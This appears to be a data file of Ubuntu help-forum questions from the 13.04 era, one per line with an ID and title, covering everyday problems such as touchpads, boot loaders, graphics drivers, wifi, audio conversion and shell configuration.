286518	dell inspiron n5110 touchpad stop working after upgrate to 13.04	i 've recently upgraded to 13.04 and touchpad partially stop working on my dell inspiron n5110 . the left and right buttons still working but motions and taps do n't . the system does detect my touchpad → xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb-ps/2 optical mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=14 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=16 [ slave keyboard ( 3 ) ] and i can disable/enable it via fn+f3 hotkey or via → xinput set-prop 15 `` device enabled '' 1 or in system settings : touchpad in my devises : → cat /proc/bus/input/devices i : bus=0011 vendor=0002 product=0008 version=0500 n : name= '' alpsps/2 alps glidepoint '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input9 u : uniq= h : handlers=mouse2 event9 b : prop=8 b : ev=b b : key=e420 0 70000 0 0 0 0 0 0 0 0 b : abs=2608000 1000003 i 've tried to debug it using evtest /dev/input/event9 and i can see noise at log file while touching touchpad . got someone any ideas how to fix that ? thank you in advance
286525	samba share , how to auto mount unmounted ntfs shared folders	i have a working samba ntfs shared folders , but they have to be mounted first before i can open them from another computer . is there a way to auto mount them ?
286526	fixed accidentally deleted all users and forgotten root password . how can i use my computer again ?	the problem is now fixed by completely resetting the computer and reinstalling windows . here is the old question though : i wanted to delete just one user , but the window did n't react to my mouse so i clicked the button again . now there 's no user left , and i forgot the password for root ( when i select 'root ' from the recovery menu , it 's asking me to enter the password ) . i am using ubuntu 13.04 . what can i do to add a new admin account and use my computer again ? i did some research , but no solution i found completely fits in my situation . and : it is n't a duplicate ! in that other question , ubuntu did n't ask for a root password . but here it does !
286527	ca n't choose what operating system i want to use	i have a laptop that came with windows 8 preinstalled . when i turned it on for the first time , i had only c partition and a recovery partition . i shrank the c partition in order to get some unallocated space for ubuntu . then i setup cd as the first boot device , and started the ubuntu installation . the installation of ubuntu is finished , but when i restart my computer i ca n't chose what operating system i want to use ; instead windows 8 starts automatically .
286528	problems with temperature after 13.04 update !	until the 13.04 update i was using the 12.10 version of ubuntu , ( i have a hp pavilion notebook , 6 gb ram , i5 , ati radeon hd series , ubuntu 64 bit ) , and i was having no problems with temperature ( always cooler than 75째 , installed jupiter ) , but since i 've updated it to 13.04 , the temperature usually rises for nothing ( no heavy softwares running , just two firefox websites ... ) . do you know how can i solve this problem ? how can an update like this create these problems ? thanks for help , and sorry for my bad english . ruben @ ruben-hp-pavilion-g6-notebook-pc : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m/7400m series ]
286533	gnome 3 privacy settings in ubuntu 13.04	is it possible to change the gnome 3 privacy settings in ubuntu raring ? what i am missing is , for example , the configuration for the lock screen notifications .
286534	graphics driver - low grapich error	i am using ubuntu 13.04 ( latest version ) now i try to install graphics driver . i have followed this instruction how to install amd ati radeon graphics hd 6770m on ubuntu 13.04 64bit . i tried 4 times but every time when i reboot my laptop i get low graphic error . so i remove it using command on console screen sudo sh /usr/share/ati/fglrx-uninstall.sh i want to install the graphics card . i am using `` dell inspiron n5520 '' ok after i did what u guys say in comment i get this problem now a precious install of fglrx driver has been detected . please unistall the older version befor installing this version optionallu , run the installer with -- fore option to overwrite the existing driver . forcing install is not recommended . see /usr/share/ati/fglrx-install.log for more details what now
286535	how to convert .aif audio files to mp3 ?	i have audio files with .aif extensions ( aiff/amiga/mac audio ) . how to play them and , more important : how to convert them to mp3 or other more common audio format ? update : trying to run a command found here , namely for i in *.aif ; do sox `` $ i '' `` $ i.wav '' ; done , and having sox already installed , i get an error like sox fail formats : ca n't open input file 'filename ' : unsupported aifc compression type `ima4' exiftool provides info such as : file size : 41 mb file modification date/time : 2013:04:23 15:54:02+02:00 file permissions : rw-r -- r -- file type : aifc mime type : audio/x-aiff format version time : 1990:05:23 14:40:00 num channels : 1 num sample frames : 1257382 sample size : 0 sample rate : 16000 compression type : unknown ( ima4 ) for some reason sudo apt-get install ffmpeg libavcodec-unstripped-52 would not work ( unable to locate package - but multiverse is enabled )
286536	battery backup decreased drastically	mine is a hp pavillion dv6-6015tx laptop . i dual boot windows 7 and ubuntu 13.04 . one glaring problem i have found with ubuntu 13.04 is that it gives me a battery backup of less than an hour . although , on windows i get a minimum of 100 minutes backup . someone please help me out with this problem . i love ubuntu otherwise . thank you .
286539	vmware app loader crashed while installing vmware-tools for windows guest	i 'm running ubuntu 13.04 and vmware player 5.0.2 . i 'm trying to install win 7 as guest and when it tries to install vmware-tools , the vmware app loader crashes with the `error updating software component . any ideas whats wrong here ?
286544	ubuntu 13.04 installed but always start only windows 7	i 'm tring to install ubuntu 13.04 on my pc desktop but when i restart my pc , it always starts windows 7 , without asking me which os would i like to run . i 've got 3 hdd on my pc : 1 : 200 gb with win7 2 : 500 gb partitioned with 4 gb of swap , 150 gb of /home and the others gb of root ( / ) 3 : 2 tb of various data . i think the bootloader is on sda1 , and during the installation of ubuntu 13.04 i ca n't install a bootloader on that partition ( fatal error ) . what should i do ? here my log of fdisk : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 203.9 gb , 203928109056 bytes 255 heads , 63 sectors/track , 24792 cylinders , total 398297088 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdf56df56 device boot start end blocks id system /dev/sda1 * 63 398296937 199148437+ 7 hpfs/ntfs/exfat warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 3907029167 1953514583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x272196e3 device boot start end blocks id system /dev/sdb1 2046 7815167 3906561 5 extended /dev/sdb2 7815168 300785663 146485248 83 linux /dev/sdb3 300785664 976771071 337992704 83 linux /dev/sdb5 2048 7815167 3906560 82 linux swap / solaris
286550	error with installation of programs	i 'm using 10.04 and getting an error trying to install new software : the previous installation has n't been completed . the installation could have failed because of an error in the corresponding software package or it was canceled in an unfriendly way . you have to repair this before you can install or remove any further software . what do i need to do to fix this ?
286562	run sh script from browser	for a tiny task , i wish to execute a .sh script from within browser . i have kept the .sh script in `` /usr/lib/cgi-bin '' directory . the .sh file contains following code . # ! /bin/bash echo `` content-type : text/html '' echo python ohlc.py html code ( minimal ) is as follows . < html > < body > < a href= '' file : ///usr/lib/cgi-bin/ohlc_bat.sh '' > run < /a > < /body > < /html > after clicking the link , it opens a download dialog-box . how do i make the .sh script run ? thanks . p.s . i have tried renaming the .sh file as .cgi , no luck .
286563	will my crashed laptop accept ubuntu	my laptop has crashed with a million errors and none of the advice i tried seems to work , i was just wondering if i could switch os from windows to linux and only use linux to boot up my laptop .
286571	cant open second hard disk `` permission denied ''	i just did a clean install of 13.04 and now cant open any hard disks or hard disk partitions , it says `` permission denied '' . i can open them as root but when i try and change the permissions it says i already have full read and write privileges and wont change the options for group or other users permissions . the drives are ntfs format , for windows compatibility , while i can get in as root it is a major hassle as all my data is on the second hard drive and i cant add music or video to media players or open text documents without using root . i know similar question have been asked before and i have tried many solutions but with no luck .
286574	can i install programs on a live dvd , just to test them ?	my ubuntu 's version is 12.04 . right now i 'm using windows , but as i 've burned an ubuntu image disk to a dvd , i want to know if it 's possible to install programs on it , just to test them . will it damage any part of the live dvd ? i do n't really want them to be there all the time . is just for testing .
286575	drm different on centos than ubuntu ?	amazon prime instant video runs on top of the adobe macromedia flash-plugin and works on 32bit and 64bit versions of centos linux out-of-the-box . why does it not work on ubuntu ? is there a difference in digital rights management between the two ubuntu and centos ? is it that ubuntu uses a much newer kernel than 2.6.32-358.6.1 ? flash-plugin 11.2.202.280 flash can be reverted a number of ways , including manually downloading old versions from adobe 's archive . how can i revert to previous version of flash ?
286582	permission denied ( public key )	i have a ubuntu server and another ubuntu desktop ... when i used ssh abc @ 123.456.78.9 it just shows permission denied ( publickey ) . i have already set these to passwordauthentication no and usepam no , but even then i 'm not able to connect the server ... please help me on this issue .
286583	how can i install ultrastar deluxe in ubuntu 13.04 ?	i 'd like to install ultrastar deluxe in ubuntu 13.04 . however , the ppa only contains packages for ubuntu 12.10 , 12.04 , 10.10 and 10.04 . is there any way i can install ultrastar deluxe in ubuntu 13.04 ?
286589	bash is printing ( only ) one of my aliases before every prompt	i think this is the relevant bit of my ~/.bashrc file : # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi ( i forget where i got this from so i sadly ca n't credit the source . ) this is the only appearance of the line alias ls='ls -- color=auto ' in the ~/.bashrc file . the annoyance is : whenever i open a prompt/terminal/bash , the terminal echoes alias ls='ls -- color=auto' ( but not the others ! ) i would like to remove this notification . edit : here are the other profile files i can find on the system . # ~/.bash_profile # ! /bin/bash echo `` you 've got rhythm . you 've got music . anything else ? '' # ~/.profile # unmask 022 if [ -n `` $ bash_version '' ] ; then if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi # /etc/profile if [ `` $ ps1 '' ] ; then if [ `` $ bash '' ] & & [ `` $ bash '' ! = `` /bin/sh '' ] ; then # the file bash.bashrc already sets the default ps1 . # ps1='\h : \w\ $ ' if [ -f /etc/bash.bashrc ] ; then . /etc/bash.bashrc fi else if [ `` `id -u` '' -eq 0 ] ; then ps1= ' # ' else ps1= ' $ ' fi fi fi if [ -d /etc/profile.d ] ; then for i in /etc/profile.d/*.sh ; do if [ -r $ i ] ; then . $ i fi done unset i fi
286590	ambiance and radiance colours themes on 12.10 / 13.04	does anybody know if these themes are compatible with the latest version of gtk yet ? i like the ambiance theme but would like the orange highlights to be blue or what ever i fancy at the time . please also feel free suggest any alternatives .
286591	no sound via hdmi on 13.04	i have upgraded to 13.04 and now i have no sound . i use an hdmi lead to connect my pc to the tv , but now i do n't have that as an option to choose from . i just have two output options : digital analogue any suggestions please ?
286593	uninstall windows 8 and keep ubuntu 12.10 uefi	i did n't find any question about this . i have a computer with pre-installed windows 8 , uefi interface . is it possible , and if so , how to remove windows 8 completely and just keep ubuntu ?
286595	livecd installer just shows empty disk	when booting the livecd throws some general errors about the filesystem , drm , unhandled intr etc . when i try ubuntu i get the the ntfs partitons with windows 8 mounted and can do stuff there . there is 30gb empty space , but the installer shows me /dev/sda is totally empty , not even showing the win8 partitions . -- edit -- im trying to install ubuntu 12.10
286614	is possible to make virtual host in a ntfs partition ?	i am using ubuntu and windows . when i use windows , i ca n't access my file in var/www of my linux partition . so i try to make virtual host and directoryroot in my ntfs partition . i will combine wamp directory in the windows , and the virtual host root directory on ubuntu , but it does not work . always appears error 403 forbidden access . and when i change the permissions with chmod nothing change . what should i do ?
286617	error ca n't find the 'libpq-fe.h header	trying to set up postgres for rails . bundle install gives : ca n't find the 'libpq-fe.h header
286619	do i need to reinstall to upgrade regular ubuntu 12.10 to ubuntu gnome 13.04 ?	my home server runs 12.10 with gnome shell ( i 'm not a fan of unity ) . i ca n't find any information to tell me if the regular upgrade process will let me choose the ubuntu 13.04 remix , or whether i need to go for a complete reinstall . it took me a long time to get mythtv working in this environment , so an upgrade would be preferable !
286621	how do i run executable scripts in nautilus ?	when i double-click on a script in nautilus to run it , the script just opens in my text editor with no option to run it . using nautilus , how do i run executable text files and/or scripts ?
286624	what ( input ) types of files can ffmpeg convert and to what ( output ) files ?	i like to use simple commands ( added to thunar custom actions ) , like ffmpeg -i % f % f.mp3 . i can replace mp3 with flac for example - but what other output extensions can be used ? also , in thunar custom actions i can select which files to involve the command ( audio , video , etc ) but which exactly are the input extensions that can be used ? i have posted a similar question on avconv .
286626	what ( input ) types of files can avconv convert and to what ( output ) files ?	i like to use simple commands ( in thunar custom actions ) , like avconv -i % f % f.mp3 . i can replace mp3 with flac for example - but what other output extensions can be used ? also , in thunar custom actions i can select which files to involve the command ( audio , video , etc ) but which exactly are the input extensions that can be used ? i have posted a similar question on ffmpeg .
286628	i ca n't see all my facebook friends in the empathy chat	i have just installed ubuntu 13.04 and i connected empathy with my facebook account . it adds only a couple contacts , while i know that from the browser , many of my friends are online . how can i solve this ?
286629	ca n't boot up my laptop after upgrade to ( k ) ubuntu 13.04	yesterday i did a 'do-release-upgrade ' from my laptop ( hp dv-6 ) running flawlessly kubuntu 12.10 , to 13.04 . upgrade process ended up with no errors . but now , when laptop boots normally , hangs during graphical login . sounds it has some issue when enabling network interfaces , since they are not working at all while at the boot prompt . alternatively , if i start in recovery mode , and choose `` resume '' in the first choice list , it boots up , logins , and works normally , with working network too . ca n't understand the differences between two boot options so as to compromise the functionality of the system ... i also upgrade my desktop computer ( a quad-core amd based pc ) from 12.10 to 13.04 , with no issues at all .
286637	i consistently get two login screens	`` ... i consistently get two login screens ! i enter credentials correctly and am immediately presented with a second login screen ( no errors ) . authenticating against the second screen completes a normal login to the ubuntu desktop . '' the above is a quotation from a problem reported on 7 . may 2012 by soren mogensen . see user login cycles . i have the exact same problem , and was hoping that soren might have received an answer which would enlighten others , but unfortunately soren 's problem was reported as part of an `` answer '' to another problem , and the only `` solution '' on that occasion was advice to create a new question . i can login , i just have to present my credentials twice , so this is not a duplicate of any `` unable to login '' problem . my concern is that this looks like a classic phishing setup , where one of the two login screens is a fake designed to harvest my id and password for some nefarious purpose . if ubuntu has been susceptible to phishing attacks for nearly a year now , then i imagine that would be a matter of enormous concern .
286647	can i install steam without a credit card ?	when i try to install steam ( on ubuntu 13.04 ) from the software center , it asks for payment details even though it is free . can i install it without a credit card ?
286649	run a remote firefox session locally	i 'm trying to run a remote firefox session on my vps , to try to download some large files to the server . i 've installed firefox from the apt repo remotely , and i also have firefox installed on my ubuntu based pc . after doing : $ ssh -x root @ myip root @ myip 's password : x11 forwarding request failed on channel 0 welcome to ubuntu 11.10 ( gnu/linux 2.6.32-308.8.2.el5.028stab101.1 x86_64 ) i type the following on the server : $ firefox -no-remote ( firefox:6026 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . error : no display specified so i see two errors : `` x11 forwarding request failed on channel 0 '' and `` error : no display specified '' . i 'm doing something wrong , and would like to find out what .
286654	nvidia driver installed successfully , but not activated	my ubuntu 12.04 only shows up black screen when starting up some days ago suddenly . since i can desktop through recovery mode ( resume in recovery mode , and the resolution is wrong ) , i believe there 's something wrong with my video card driver . so i go to nvidia 's website , download the driver nvidia-linux-x86-310.44.run , and installed it successfully . now , while i can get the following output with lspci | grep -i nvidia 01:00.0 vga compatible controller : nvidia corporation gt215 [ geforce gt 335m ] ( rev a2 ) the driver seems not to be activated . when i start up nvidia x server settings , it shows up a message box saying you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . but i do run xnvidia-config successfully , and also reboot the system . what 's more , the `` additional drivers '' is blank , saying no proprietary drivers are in use on this system could anybody give some hints on how to deal with this problem ? thanks a lot !
286658	disable dash reveal animation	how can i disable dash reveal animation . when i try to open dash it takes up to 2 seconds to open it , that 's slow for me . i noticed it uses fade out animation while opening so i think when i disable that animation , reveal time will be much shorter .
286660	some webapps do n't work	i am a new ubuntu user . i installed chromium and unity webapps chromium extension . also i installed some web apps like twitter , facebook , vkontakte . but they are no appeared in social hub ( i do n't know how to name this thing . notification center or friend app ) . also they ( web apps ) do n't show information like number of not readed messages in gmail etc . i opened chrome js console to see some logs . in gmail web app i always have *** '' typeerror { } '' . *** in fb web app i have : *** '' port error : could not establish connection . receiving end does not exist . miscellaneous_bindings:236 chromehidden.port.dispatchondisconnect '' . *** also web apps do n't work in firefox .
286662	modifying brightness control shortcut key bindings	i have a toshiba satellite r830 laptop with ubuntu 13.04.1 64 bit . the fn + f6 and fn + f7 buttons adjust brightness until i put my laptop on sleep . on wakeup they do n't work any longer . on ubuntu 12.04 and 12.10 i had the same issue but i solved it by modifying the grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' this is no longer working on 13.04 . i noticed that before i put my laptop on sleep i can change the brightness by manually changing the value of the /sys/class/backlight/toshiba/brightness file with the echo 4 | sudo tee /sys/class/backlight/toshiba/brightness command . values are 0 to 7 . i can also change the brightness manually by using the echo 400 | sudo tee /sys/class/backlight/intel_backlight/brightness command . values are much higher . i do n't know the maximum or minimum , but setting it to 300 is very low and 4000 is very high . after i put my laptop on sleep and wake it up again , the latter continue to work but not the former . it seems the shortcut keys and brightness control settings are bound to the ../toshiba/brightness value . is there a way to go solve this problem by pointing the shortcut keys to the ../intel_backlight/brightness value ? or in some other way ? i would like to avoid using an old kernel if possible .
286665	how to restore wine configuration to default ?	i recently messed up with my wine , and now it ca n't open any application . how do i restore wine to original state and remove everything installed application , just like when it was first installed .
286666	setting lightdm background from command-line without unity	when i 'm running unity , i can set the background image with the following command : gsettings set org.gnome.desktop.background picture-uri `` file : // $ file '' . this also changes the background of the lightdm login screen when my user is selected . however , i use fluxbox most of the time . i have a script that randomly changes my background , and does so with the following commands : gsettings set org.gnome.desktop.background picture-uri `` file : // $ file '' fbsetbg -a `` $ file '' the gsettings line does nothing in fluxbox , but i assumed it would set the lightdm background . unfortunately , it does not . it seems that perhaps gnome-session needs to be running so that command works ? if so , is there a fake gnome-session i can run that will accomplish setting the background , without a bunch of unnecessary processes running in the background ? or is there another command i can run that will change the lightdm background ( without root privileges ) when i change my desktop background ? by the way , i 'm running 12.10 , but will upgrade to 13.04 in a couple weeks .
286667	gnome-pie in ubuntu 13.04	i recently upgraded from ubuntu 12.10 to ubuntu 13.04 . in 12.10 , i made use of the gnome-pie application launcher , installed from the ppa : simonschneedgans/testing source . when i try to install gnome-pie in ubuntu 13.04 , i get the error the dependency libbamf3-0 must be installed but is not installable . i am unsure if this is a bug , has a workaround , or needs attention from the developer . either way , please help !
286669	some kwin shortcuts does not work in 13.04	i am fresh new to kubuntu . i was looking a way to move focused window as windows do ( win key + arrow keys change the layout of the window ) . i found there are options for this in `` global keyboard shortcuts '' ( in kwin tab ) . unfortunately , it seems to not work . for example , `` move window down '' is `` meta+down '' . i believe the `` meta '' key is the window key on my keyboard , and `` down '' the down arrow key . but it does nothing . even if i change the key for ctrl+shift+k ( i apply the settings each time ) . is the feature broken ? is there another way to do it in kubuntu ( without installing another software ) . my kubuntu version is 13.04 and my keyboard a logitech k350 ( i also tried with the virtual keyboard kvkbd without any luck ) .
286670	what are the real benefits of upgrading to ubuntu 13.04 ?	what are the real benefits of upgrading to ubuntu 13.04 ? please do n't consider applications that currently you can get using different sources ... is more faster ? use less memory ? optimized for ? currently i am using 12.04 . thanks in advance ! ignacio.-
286673	failed to download repository information 12.10	ca n't update software in 12.10 . get the `` failed to download repository information '' with the following below . tried searching with these responses , but to no avail . any ideas ? w : failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
286675	msm mf110/mf627/mf636 and ubuntu 13.04	i have a 3g modem , from orange . my lsusb output : bus 003 device 004 : id 19d2:0031 zte wcdma technologies msm mf110/mf627/mf636 so , the problem is that this modem is not always detected . for example when i turn on my notebook , i wait ~ 40 seconds and sometimes the connection appears in the connections menu , but sometimes not . can anyone explain me what is the problem and how to fix it ? using ubuntu 13.04 64 ps : sorry for my english , i am from romania . thanks .
286676	ca n't get mailfrom to work in crontab on ubuntu server 12.04	is mailfrom supported in crontab in ubuntu server 12.04 ? cron job errors are sent via exim ok , but the sender , root @ localhost , is not acceptable . mailfrom in crontab works fine on my fedora core 15 server .
286684	is 'libavcodec-unstripped-52 ' still available ?	when coming to converting media in ffmpeg and avconv , there are a lot of solutions on the net as well as on askubuntu indicating to install libavcodec-unstripped-52 . but in lubuntu and xubuntu quantal was not able to find it . ( see this question . ) so , i am in quantal , multiverse repo is enabled and there is no libavcodec-unstripped-52 to be found . but there is a libavcodec-extra-53 which worked as seen in the answer to the linked question .
286687	cant connect to wifi on 13.04	just installed 13.04 but cant connect to home wifi using realtek 8188 wlan adapter it keeps asking for password .
286690	how do i make a complete image file boot disc	i 'm a crusty old fert who 's gotten fed up with ms , plus i have security concerns . i 'd like to make an image file boot of ubuntu , a pdf printer ( possibly a complete editor ? ) , and if possible , a driver for my lexmark prevail pro . at the risk of sounding paranoid , i 'd like to be able to check my retirement account without the worry of my os being tampered with , therefore , the image file . any ideas how to accomplish this ? by the way , i only know what i 've read , so if you start talking in terms of kernel this or execute that , i 'm going to be lost . thanks for any input .
286691	no window borders , ca n't see unity , uninstall mint skin	i have no windows borders . it is probably a compiz fusion issue . but i do n't know how to uninstall that . i ca n't see unity , it worked in 12.04 but not on 12.10 or 13.04 . and i want to uninstall the linux mint theme/skin which has never looked right . up until oddly enough 13.04 in which it looks ok. can i just clean install the 13.04 without wiping the whole hard drive ?
286694	ubuntu 13.04 uefi problems	note : i 've had problems with all variants of *buntu edit : tried ubuntu gnome 13.04 and it just hangs during uefi boot , just a black screen i can type on til it freezes . edit 2 : tried lubuntu 13.04 and kubuntu 13.04 again , same problem . tried everything through legacy mbr boot , same problem , all with the live media . now it just hangs and wo n't do anything . so i download ubuntu 13.04 first , and when i go to boot the live cd through uefi , it hangs for a bit then spams and after all of that , it finally boots into the live environment . it installs fine , no problems there . then it goes to boot the installation , and it hangs and has a waiting for root device error , and takes me to a busybox console . after a minute or so , it also spams an modprobe error ! , and after it 's stops spamming that , i can type `` exit '' and it goes into ubuntu , and everything seems alright after . then kubuntu 13.04 , wo n't finish installing , it keeps failing at the bootloader deployment , first it was this grub-dummy package , then it failed with grub-efi . i really have no idea what to do , ubuntu 13.04 does work , but why am i having these boot problems ? hardware : asus republic of gamers crosshair v formula z amd motherboard amd fx-8350 radeon hd 7870 8gb ddr3-2133 120gb samsung ssd 1tb seagate barracuda belkin wireless n wifi adapter built in audio it wo n't let me put links and stuff because `` i dont have enough reputation '' so no idea how to get help for my problem when i ca n't show it . images :
286695	scheduled download by transmission during nightly hours ? ( downloading just at a specified period of a day )	i want to limit transmission to work at 02:00 am untill 08:00 . how ?
286699	uwsgi with python3 how to get the plugin ( not from apt )	how to run uwsgi with python 3 instead of python 2 ? i 've compiled the latest version of uwsgi , and i know there are plugins which can be installed by apt-get , but how can i get it ( shall i compile it from source ? )
286702	where does gnome-contacts application store its data ?	looks like ubuntu 13.04 added gnome-contacts application . its pretty useless or its older version which is shipped , i ca n't even delete contacts i have added . my question is where does it store its data ?
286707	stencyl wont extract ? ubuntu 12.10 64-bits	so , i 'm on ubuntu 12.10 64-bits , and i 'm trying to get stencyl to work . i have stencyl-2.1.0.tar.gz , but when i try to extract it ( like it says to do in the stencyl download instructions ) it gives me an error that looks like this : an error occurred while extracting files . truncated gzip input and then the window closes . i 've tried a number of fixes but nothing seems to be working . i 'm sure i 'm doing something incredibly stupid , as i 'm very new to linux , but i 'm having trouble with this . any ideas ?
286710	how can i fix wifi issues with 13.04 on aspire v5-571 ?	yesterday i upgraded from ubuntu 12.10 to 13.04 . i absolutely loved it until i realized the wireless connection would only last for about five minutes and then become unusable . i searched all over and ended up trying this and this . nothing was working so i eventually reverted back to using 12.10 and everything is working great again . i would love to be using 13.04 right now so i am asking for help with this issue . here is some of the info i got for my system after i re-installed 12.10 , let me know if any other information would be helpful . thanks ! *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:02:00.2 logical name : eth0 version : 0a serial : 20:6a:8a:80 : f3:58 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff *-network description : wireless interface product : ar9462 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 44:6d:57 : b0 : fc:5b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-27-generic firmware=n/a ip=10.7.190.29 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : f0500000-f057ffff memory : dfa00000-dfa0ffff
286711	why does gedit window open when i double-click a program file , `` start-tor-browser '' ?	when i double-click the file , `` start-tor-browser , '' the only thing that happens is a gedit window opens and displays a ton of programming code . the program does not execute . how to i make double-clicking `` start-tor-browser '' run my program , tor browser bundle , instead of opening a gedit window ?
286713	how does 13.04 stack up to 12.04 in terms of battery life ?	i 've been having some issues with battery life , perhaps due in part to the age of the battery , but i 'd like to squeeze out every last minute i can . i 've heard that 13.04 is developed with mobile devices in mind and has some emphasis on battery life . can any laptop users report on how it has positively ( or negatively ) affected their battery life , in relation to 12.04/12.10 ?
286715	xubuntu 12.04 freezes before login on splash screen	before you mark this as a duplicate for this what should i do when ubuntu freezes ? note that it is for issues after login , not before . i have tried previous versions of the kernel , alt-f2 , ctrl-alt-f1 , alt-sysreq reisub , ctrl-alt-backspace , none work once it stops . last thing on screen is `` stopping save kernel messages '' if i hide the splash screen . tried everything in recovery mode . for some reason i can not boot from cd either , so am kinda stuck . i had added a line to fstab that was not accepted , but earlier in the week it did boot from cd and i was able to remove the offending line , so it does not look like a grub issue . it seems maybe it is related to the amd catalyst drivers i loaded , but those have worked for 2 weeks at least , so no idea really . is there a list of what runs when during the boot sequence so i know what the next task after the `` stopping save kernel messages '' ? would be a clue at least . ideas ? thx david
286722	hibernate not working on ubuntu 13.04	my computer supports hibernation and it hibernation finely worked on ubuntu 12.04 and 12.10 and now i am using ubuntu 13.04 x32bit and i have tried every method for enabling hibernation option but nothing seems to be worked ... i have also tried sudo pm-hibernate command for checking hibernation and every thing seems perfectly please anyone , can tell how could i get hibernate option .
286723	totem `` playing '' icon	since upgrading to 13.04 , totem ( videos ) now shows a big white `` play '' icon when going from paused video to playing . how do i disable this `` facility '' ?
286724	how to resize windows with alt+right click instead of alt+middle click in ubuntu 13.04	the title says it all . i want to resize windows with an right click while holding the alt key , instead of the new default alt+middle click . i have found no way to enable this behaviour in 13.04 . the gconf-key suggested in this solution for 12.04 , does n't seem to exist any longer .
286725	nonresponsive while copying files	i just switched from win8 to ubuntu 13.04 as my sole os and it 's pretty nice overall . but as the last time i tried using linux i see i still have problems simply moving large files around and searches around the web say to try the deadline i/o scheduler which seems to be the default in 13.04 anyways and i 've confirmed all my drives are set to deadline . i have 1 32gb ssd which has my / folder on it , my /home folder is on a ext4 formatted 1tb hdd . i have 2 more 1tb hdd 's of which 1 is formatted in ntfs still . i am trying to copy from this ntfs drive to the /home drive . what strikes me as strange is that the ssd should contain all my programs such as firefox , so i do n't understand why copying between the hdd 's would slow down everything else when it should n't be under any load . often my firefox browser will dim and not let me do anything as if it 's crashed , but will come back after a few seconds . what can i do ?
